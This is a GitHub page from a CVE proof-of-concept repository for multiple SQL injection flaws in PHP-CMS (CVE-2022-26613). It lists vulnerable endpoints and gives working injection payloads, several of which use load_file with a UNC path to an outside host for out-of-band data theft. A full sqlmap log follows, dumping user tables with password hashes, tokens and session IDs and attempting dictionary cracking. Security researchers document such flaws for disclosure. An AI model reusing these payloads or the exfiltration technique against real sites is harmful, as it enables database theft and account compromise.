Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-mitre/2022/CVE-2022-26613/
CVE-mitre/2022/CVE-2022-26613/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 

Multiple SQLi

Infected apps:

http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php 
http://pwned_host.com/PHP-CMS-master/search.php 

Payloads:

---
Parameter: category (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) OR NOT 2848=2848

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 4559 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(4559=4559,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 5517 FROM (SELECT(SLEEP(5)))RgGf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) UNION ALL SELECT NULL,NULL,CONCAT(0x7170767671,0x797054776f65536e4a79476a475a6f6a4e5156644c427a4a534368524f65764a4e585a4b7258656f,0x716b766b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---

Dump:

Database: cms
Table: users
[4 entries]
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| user_id | token                                                                                                | randSalt                      | username      | user_role  | user_email           | user_image | user_lastname | user_password                                                | user_firstname |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| 17      | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | harshitbansal | admin      | example@gmail.com    | <blank>    | bansal        | $2y$10$iusesomecrazystrings2uvgnjnDOGIE6JPA9zzq36EdPnYMUav/S | harshit        |
| 20      | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | priyanka      | subscriber | example@gmail.com    | <blank>    | sharma        | $2y$12$JWAZjgfODGxhEpsJShk4TO5MHGZ/hUnliFfkwPEvsLkfCJOdJ6ugy | priyanka       |
| 22      | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | raghuveer     | subscriber | example123@gmail.com | <blank>    | singh         | $2y$12$kTq/GUEkryih.nT9O77KfeyMp9165ZIqlvu1dEOQLKW8RWv0te46W | raghuveer      |
| 26      | <blank>                                                                                              | $2y$10$iusesomecrazystrings22 | raghuveer23   | subscriber | example@gmail.com    | <blank>    | sharma        | $2y$12$23Bqzby0qrz3VfojjbZjT.e4nwL7a68nJk7A4E9bgolDlWmG0lL7m | raghuveer      |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+

[14:47:11] [INFO] table 'cms.users' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users.csv'
[14:47:11] [INFO] fetching columns for table 'posts' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'posts' in database 'cms'
Database: cms
Table: posts
[9 entries]
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| post_id | post_category_id | post_date  | post_tags                              | post_user     | post_image                  | post_title   | post_status | post_content                                                                                                                                                                                                                               | post_views_count | post_comment_count |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| 1       | 1                | 2018-10-16 | harshit,website                        | harshitbansal | Boeremark.jpg               | Website      | draft       | you are doing well...\r\n                                                                                                                                                                                                                  | 1                | 2                  |
| 2       | 1                | 2018-10-21 | life,Rajesh,How to work                | raghuveer     | 544106281_1280x720.jpg      | How to work? | draft       | you should move on without afraid of what will the curcumstances...                                                                                                                                                                        | 2                | 0                  |
| 3       | 1                | 2018-10-24 | Android, namandeep, mobile, smartphone | priyanka      | work-life-balance.jpg       | Android      | published   | Android is a mobile operating system developed by Google, based on a modified version of the Linux kernel and other open source software and designed primarily for touchscreen mobile devices such as smartphones and tablets             | 1                | 1                  |
| 8       | 1                | 2019-01-10 | life , ctrl                            | harshitbansal | life-008.jpg                | life         | published   | life has no ctrl+z \r\nhahahaha                                                                                                                                                                                                            | 0                | 0                  |
| 10      | 1                | 2018-10-21 | time, money                            | raghuveer     | time.jpeg                   | Time         | published   | time is money.                                                                                                                                                                                                                             | 0                | 1                  |
| 11      | 1                | 2018-10-21 | goes on, suresh, life                  | raghuveer     | life-expectancy-decline.jpg | Goes on      | published   | this is the content for this post.                                                                                                                                                                                                         | 0                | 0                  |
| 12      | 3                | 2018-10-30 | dvjdjsv                                | vijay         | <blank>                     | fdnbkfd      | d,jvsd      | bdssvkbdsk                                                                                                                                                                                                                                 | 0                | 0                  |
| 13      | 1                | 2018-11-08 | vinod, diwali                          | vijay         | <blank>                     | diwali       | published   | <p>hello frnds happy diwali!!</p>                                                                                                                                                                                                          | 0                | 0                  |
| 14      | 3                | 2019-01-10 | accounts, tanya, bela                  | priyanka      | <blank>                     | accounts     | published   | <p>accounting is an identifying process</p>                                                                                                                                                                                                | 0                | 0                  |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+

[14:47:11] [INFO] table 'cms.posts' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\posts.csv'
[14:47:11] [INFO] fetching columns for table 'comments' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'comments' in database 'cms'
Database: cms
Table: comments
[5 entries]
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| comment_id | comment_post_id | comment_date | comment_email     | comment_author | comment_status | comment_content |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| 25         | 1               | 2019-01-16   | example@gmail.com | daau           | show           | vfadvcv         |
| 26         | 1               | 2019-01-16   | example@gmail.com | dinesh         | show           | vfvfdvfsv       |
| 27         | 2               | 2019-01-16   | example@gmail.com | daau           | show           | fvfvfev         |
| 28         | 2               | 2019-01-16   | example@gmail.com | dinesh         | show           | vfbgrbrt        |
| 37         | 2               | 2019-01-19   | example@gmail.com | fdgd           | show           | cxvfv           |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+

[14:47:12] [INFO] table 'cms.comments' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\comments.csv'
[14:47:12] [INFO] fetching columns for table 'users_online' in database 'cms'
[14:47:12] [INFO] fetching entries for table 'users_online' in database 'cms'
[14:47:12] [INFO] recognized possible password hashes in column '`session`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[14:47:12] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'D:\CVE\sqlmap\data\txt\nu11secur1ty.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[14:47:12] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:47:12] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[14:47:12] [INFO] starting 8 processes
[14:47:13] [WARNING] no clear password(s) found
Database: cms
Table: users_online
[4 entries]
+----+------------+----------------------------------+
| id | time       | session                          |
+----+------------+----------------------------------+
| 28 | 1541324861 | acqtk6uivrc3mancr6jubo36g8       |
| 40 | 1548511410 | ipke8cras4eauiu50upkm1mocd       |
| 41 | 1548401977 | l4qj6m6jv3ges0us7cqvrqovhq       |
| 42 | 1562584762 | fd7b414bec20e569f9bd17c4e7ef4c13 |
+----+------------+----------------------------------+

[14:47:13] [INFO] table 'cms.users_online' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users_online.csv'
[14:47:13] [INFO] fetching columns for table 'categories' in database 'cms'
[14:47:14] [INFO] fetching entries for table 'categories' in database 'cms'
Database: cms
Table: categories
[5 entries]
+--------+-------------------------------------------+-----------+---------------+
| cat_id | cat_user                                  | cat_title | cat_creator   |
+--------+-------------------------------------------+-----------+---------------+
| 1      | harshit,raghuveer23,raghuveer,vikas,daau, | home      | harshitbansal |
| 3      | <blank>                                   | service   | harshitbansal |
| 5      | <blank>                                   | contact   | harshitbansal |
| 7      | raghuveer,                                | about     | harshitbansal |
| 55     | <blank>                                   | hello     | harshitbansal |
+--------+-------------------------------------------+-----------+---------------+

[14:47:14] [INFO] table 'cms.categories' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\categories.csv'
[14:47:14] [INFO] fetched data logged to text files under 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com'

[*] ending @ 14:47:14 /2022-04-11/

STATUS Critical! =)

NOTE:

  • The PoC will be encrypted, sorry about this dear friends!
  • If someone wants to see this work, please write me!
  • KR @nu11secur1ty - Penetration Testing Engineer